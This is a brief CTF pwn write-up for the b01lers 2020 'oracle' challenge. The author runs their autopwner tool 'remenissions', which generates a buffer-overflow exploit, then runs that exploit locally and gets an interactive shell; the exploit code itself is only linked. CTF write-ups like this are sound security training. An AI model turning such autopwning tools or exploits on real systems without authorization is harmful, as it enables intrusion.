Tags: pwn 

Rating: 5.0

So for this challenge, I solved it using my autopwner remenissions (https://github.com/guyinatuxedo/remenissions).

Step 0.) Run Autopwner

```
$ remenissions -b oracle

Analyzing Binary: oracle

. . .

INFO REPORT: Post-analysis succeeded for file: /oracle (HeadlessAnalyzer)
INFO REPORT: Save succeeded for processed file: /oracle (HeadlessAnalyzer)
[+] Starting local process './oracle': pid 10145
[*] running in new terminal: /usr/bin/gdb -q "./oracle" 10145 -x /tmp/pwn80jxjmon.gdb
[-] Waiting for debugger: debugger exited! (maybe check /proc/sys/kernel/yama/ptrace_scope)

Exploit Successful: exploit-BofFunc.py
```

Step 1.) Have Exploit

```
$ python3 verified-exploit-BofFunc.py
[+] Starting local process './oracle': pid 10175
[*] running in new terminal: /usr/bin/gdb -q "./oracle" 10175
[-] Waiting for debugger: debugger exited! (maybe check /proc/sys/kernel/yama/ptrace_scope)
[*] Switching to interactive mode
Know Thyself.
$ w
23:50:47 up 12:17, 1 user, load average: 0.34, 0.18, 0.08
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
guyinatu :0 :0 11:35 ?xdm? 2:38 0.01s /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu gnome-session --session=ubuntu
$ ls
oracle remenissions-work verified-exploit-BofFunc.py
```

For the exploit, checkout: https://github.com/guyinatuxedo/remenissions_test/tree/master/01-BofFunc/b01lers20_oracle

Original writeup (https://github.com/guyinatuxedo/remenissions_test/tree/master/01-BofFunc/b01lers20_oracle).